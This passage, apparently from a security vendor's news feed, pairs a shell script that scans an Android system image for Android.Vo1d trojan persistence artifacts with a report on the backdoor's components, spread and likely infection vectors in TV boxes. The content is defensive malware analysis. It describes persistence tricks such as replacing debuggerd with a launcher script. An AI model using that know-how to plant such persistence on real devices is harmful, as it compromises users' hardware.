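# persistence artifacts described in the report in an Android /system tree.
# Usage:  sh vo1d_check.sh /            (live device, needs root to read /system/bin)
#         sh vo1d_check.sh /mnt/sysimg  (mounted or pulled system image)
# Assumed locations (adjust for your firmware): install-recovery.sh in
# /system/etc (AOSP default) or /system/bin; daemonsu in /system/xbin or /system/bin.

is_elf() {
  # The genuine debuggerd is a native binary: its first four bytes are the
  # ELF magic 7f 45 4c 46. A replacement shell script starts with "#!".
  [ -r "$1" ] || return 1
  [ "$(head -c 4 "$1" | od -An -tx1 | tr -d ' \n')" = "7f454c46" ]
}

references_wd() {
  # Does this boot-time script start the trojan's "wd" component?
  # Matches a bare or path-qualified "wd" token, not words such as "wdog".
  [ -r "$1" ] || return 1
  grep -Eq '(^|[[:space:]/])wd([[:space:]]|;|$)' "$1"
}

vo1d_check() {
  root="${1%/}"        # "/" becomes "" so paths stay absolute on a live device
  hits=0

  # 1. Dropped components named in the report.
  for f in /system/xbin/vo1d /system/xbin/wd; do
    if [ -e "$root$f" ]; then
      echo "HIT: unexpected file $f"
      hits=$((hits + 1))
    fi
  done

  # 2. debuggerd (or the debuggerd_real copy) replaced by a script.
  for f in /system/bin/debuggerd /system/bin/debuggerd_real; do
    if [ -e "$root$f" ]; then
      if ! is_elf "$root$f"; then
        echo "HIT: $f is not an ELF binary (possible wd launcher script)"
        hits=$((hits + 1))
      fi
    fi
  done

  # 3. Autostart entries for wd in boot-time scripts (paths are assumptions).
  for f in /system/etc/install-recovery.sh /system/bin/install-recovery.sh \
           /system/xbin/daemonsu /system/bin/daemonsu; do
    if references_wd "$root$f"; then
      echo "HIT: $f references wd"
      hits=$((hits + 1))
    fi
  done

  echo "vo1d indicators: $hits"
  [ "$hits" -eq 0 ]   # exit status 0 = clean, 1 = indicators present
}

# Stand-alone use: scan the tree given as the first argument.
if [ "$#" -gt 0 ]; then
  vo1d_check "$1"
fi
```

&lt;p&gt;A non-zero exit status means at least one indicator was found; the HIT lines say which. Absence of hits is not proof of a clean box, since the report itself notes that the set of modified files varied between victims, so treat the script as a first pass and follow the published indicators of compromise for the full list.&lt;/p&gt;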

&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt;’s main functionality is concealed in its &lt;span class="string"&gt;vo1d&lt;/span&gt; (&lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d.1&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d.1&lt;/b&gt;&lt;/a&gt;) and &lt;span class="string"&gt;wd&lt;/span&gt; (&lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d.3&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d.3&lt;/b&gt;&lt;/a&gt;) components, which operate in tandem. The &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d.1&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d.1&lt;/b&gt;&lt;/a&gt; module is responsible for &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d.3&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d.3&lt;/b&gt;&lt;/a&gt;’s launch and controls its activity, restarting its process if necessary. In addition, it can download and run executables when commanded to do so by the C&amp;C server. In turn, the &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d.3&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d.3&lt;/b&gt;&lt;/a&gt; module installs and launches the &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d.5&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d.5&lt;/b&gt;&lt;/a&gt; daemon that is encrypted and stored in its body. This module can also download and run executables. Moreover, it monitors specified directories and installs the APK files that it finds in them.&lt;/p&gt;

&lt;p&gt;A study conducted by Doctor Web malware analysts showed that the &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; backdoor has infected around 1.3 million devices, while its geographical distribution included almost 200 countries. The largest number of infections were detected in Brazil, Morocco, Pakistan, Saudi Arabia, Russia, Argentina, Ecuador, Tunisia, Malaysia, Algeria, and Indonesia.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/02_Android.Vo1d_map_en.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/02_Android.Vo1d_map_en.png" alt="Countries with the highest number of infected devices detected" style="width:75%;"&gt;
  &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Countries with the highest number of infected devices detected&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;One possible reason why the attackers distributing &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; specifically chose TV boxes is that such devices often run outdated Android versions with unpatched vulnerabilities and no further updates. For example, the devices of the users who contacted us are all based on Android 7.1, even though the configuration of some of them declares much newer versions such as Android 10 and Android 12: all three models in the table above report the build ID NHG47K, which is an Android 7.1.2 build, regardless of the version string shown. Unfortunately, it is not uncommon for budget device manufacturers to ship older OS versions and pass them off as more up-to-date ones to make the devices more attractive.&lt;/p&gt;

&lt;p&gt;In addition, users themselves may mistakenly perceive TV boxes to be better protected devices, compared to smartphones. As a result, they may install anti-virus software on these less often and risk encountering malware when downloading third-party apps or installing unofficial firmware. &lt;/p&gt;

&lt;p&gt;At the moment, the source of the TV boxes’ backdoor infection remains unknown. One possible infection vector could be an attack by an intermediate malware that exploits operating system vulnerabilities to gain root privileges. Another possible vector could be the use of unofficial firmware versions with built-in root access.&lt;/p&gt;

&lt;p&gt;Dr.Web anti-virus for Android successfully detects all known &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; trojan variants, and, if root access is available, cures the infected devices.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.Vo1d/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;More details on &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d.1&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d.1&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;More details on &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d.3&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d.3&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;More details on &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d.5&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d.5&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item></channel></rss>
